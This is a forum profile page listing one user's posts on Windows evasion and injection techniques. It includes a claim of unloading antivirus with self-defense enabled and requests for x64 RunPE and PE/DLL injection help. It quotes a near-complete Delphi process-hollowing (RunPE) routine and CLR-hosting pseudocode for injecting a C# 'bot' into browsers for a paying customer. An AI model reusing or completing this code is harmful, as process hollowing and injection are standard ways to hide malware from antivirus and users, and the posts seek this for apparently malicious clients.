• Content count

  • Joined

  • Last visited

  • Days Won


Nilson last won the day on June 7

Nilson had the most liked content!

Community Reputation

4 Neutral

About Nilson

  • Rank
  • Birthday 02/15/1980
  1. Video demonstrate unloading anti-virus engine from memory with enabled self-defense , also all jobs done via user mode there is no other information available Video on youtube
  2. I'm using Jetico BestCrypt, i think its better than bitlocker
  3. Source Code was removed because it cause some critical error in protected apps , i will upload fixed one
  4. I Compiled it , but in this section of code return false and exit , why ? If (GetThreadContext(ProcessInfo.hThread, Context) And (ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Rbx + 8), @BaseAddress, SizeOf(BaseAddress), BytesRead)) And
  5. I can't Compile it i have use this source code ... Function MemoryExecute(Buffer :Pointer;Parameters: String; Visible: Boolean): TProcessInformation; type HANDLE = THandle; PVOID = Pointer; LPVOID = Pointer; SIZE_T = Cardinal; ULONG_PTR = Cardinal; NTSTATUS = LongInt; LONG_PTR = Integer; PImageSectionHeaders = ^TImageSectionHeaders; TImageSectionHeaders = Array [0..95] Of TImageSectionHeader; Var ZwUnmapViewOfSection :Function(ProcessHandle: THANDLE; BaseAddress: Pointer): LongInt; stdcall; ProcessInfo :TProcessInformation; StartupInfo :TStartupInfo; Context :TContext; BaseAddress :Pointer; BytesRead :DWORD; BytesWritten :DWORD64; I :ULONG; OldProtect :ULONG; NTHeaders :PImageNTHeaders; Sections :PImageSectionHeaders; Success :Boolean; ProcessName :string; Buf: array[0..1] of Byte; Function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader; Begin Result := PImageSectionheader( ULONG_PTR(@NTheader.OptionalHeader) + NTHeader.FileHeader.SizeOfOptionalHeader); End; Function Protect(Characteristics: ULONG): ULONG; Const Mapping :Array[0..7] Of ULONG = ( PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_READWRITE, PAGE_EXECUTE_READWRITE ); Begin Result := Mapping[ Characteristics SHR 29 ]; End; Begin @ZwUnmapViewOfSection := GetProcAddress(LoadLibrary('ntdll.dll'), 'ZwUnmapViewOfSection'); ProcessName := ParamStr(0); FillChar(ProcessInfo, SizeOf(TProcessInformation), 0); FillChar(StartupInfo, SizeOf(TStartupInfo), 0); StartupInfo.cb := SizeOf(TStartupInfo); StartupInfo.dwFlags := STARTF_USESHOWWINDOW; if Visible Then StartupInfo.wShowWindow := SW_NORMAL else StartupInfo.wShowWindow := SW_Hide; If (CreateProcess(PChar(ProcessName), PChar(Parameters), NIL, NIL, False, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo)) Then Begin Success := True; Result := ProcessInfo; Try If (GetThreadContext(ProcessInfo.hThread, Context) And (ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Rbx + 8), @BaseAddress, SizeOf(BaseAddress), BytesRead)) And (ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress) >= 0) And (Assigned(Buffer))) Then Begin NTHeaders := PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew)); BaseAddress := VirtualAllocEx(ProcessInfo.hProcess, Pointer(NTHeaders.OptionalHeader.ImageBase), NTHeaders.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE); If (Assigned(BaseAddress)) And (WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer, NTHeaders.OptionalHeader.SizeOfHeaders, BytesWritten)) Then Begin Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders)); For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do If (WriteProcessMemory(ProcessInfo.hProcess, Pointer(Cardinal(BaseAddress) + Sections[i].VirtualAddress), Pointer(Cardinal(Buffer) + Sections[i].PointerToRawData), Sections[i].SizeOfRawData, [b]BytesWritten[/b])) Then VirtualProtectEx(ProcessInfo.hProcess, Pointer(Cardinal(BaseAddress) + Sections[i].VirtualAddress), Sections[i].Misc.VirtualSize, Protect(Sections[i].Characteristics), OldProtect); If (WriteProcessMemory(ProcessInfo.hProcess, Pointer(Context.Rbx + 8), @BaseAddress, SizeOf(BaseAddress), [b]BytesWritten[/b])) Then Begin Context.Eax := ULONG(BaseAddress) + NTHeaders.OptionalHeader.AddressOfEntryPoint; IB := Pointer(Context.rax); Success := SetThreadContext(ProcessInfo.hThread, Context); End; End; End; Finally If (Not Success) Then TerminateProcess(ProcessInfo.hProcess, 0) else ResumeThread(ProcessInfo.hThread); End; End; End; Compile Error says : [dcc64 Error] Debugger.dpr(180): E2033 Types of actual and formal var parameters must be identical and i don't know what he/she says
  6. Hi As every one knows popular RunPE Methods just works for x86 PE Files , is there any RunPE for runing x64 Files ? What changes may be applied to current runpes to be compatible with loading x64 Files Thanks
  7. Thanks 4e4en , you are right , i will try it and hope get successes
  8. Is there any idea ??? i really need some information and help
  9. No you are talking about Remote Code Injection , but i want to inject whole of DLL into PE File as New Section and change OEP to Main of injected dll In 32 bit there is no problem but in 64 bit PE Files i don't know what i should to do and there is no example
  10. I did it but PE-Inject Can't Inject x64 Dll File and Show "Out Of Memory" Message
  11. Hi I have a little expreince with injection of x86 DLL into x86 PE File ( Like Packers/Protectors ) But older methods ( Like PE-Inject Method ) did not works on x64 PE Files , any idea ? any help ? Please Help Thanks
  12. Use SecureCode Component , its not free but very good
  13. First Learn Reading Carefully .... I said
  14. s you may already know I'm not a .NET guy... I usually do native code, but now I've got a big money customer that wants C# bot... the bot needs to be injected into native processes, like browser kind of shit... so I was googling about how to run managed code inside of a regular native process... doing it in fact is pretty easy (via COM-objects), here's the pseudocode: ICLRRuntimeHost* host = NULL; CorBindToRuntimeEx(NULL, L"wks", 0, CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (LPVOID*)&host); host->Start(); host->ExecuteInDefaultAppDomain(L"", L"", L"", L"", NULL); host->Stop(); host->Release(); so I programmed it in position and architecture independent code, inject it to x86 and x64 processes and it works as expected, but... it seem that CLRRuntimeHost interface doesn't provide a way to load assembly from memory, only from file... I still couldn't figure out how to load it from memory...I have an idea to call System.Reflection.Assembly.Load method using ExecuteInDefaultAppDomain, but I don't know how to do it properly... That's all from and there is no answers , this is my question too , can some body help how to do it ?
  • Who's Online   0 Members, 0 Anonymous, 4 Guests (See full list)

    There are no registered users currently online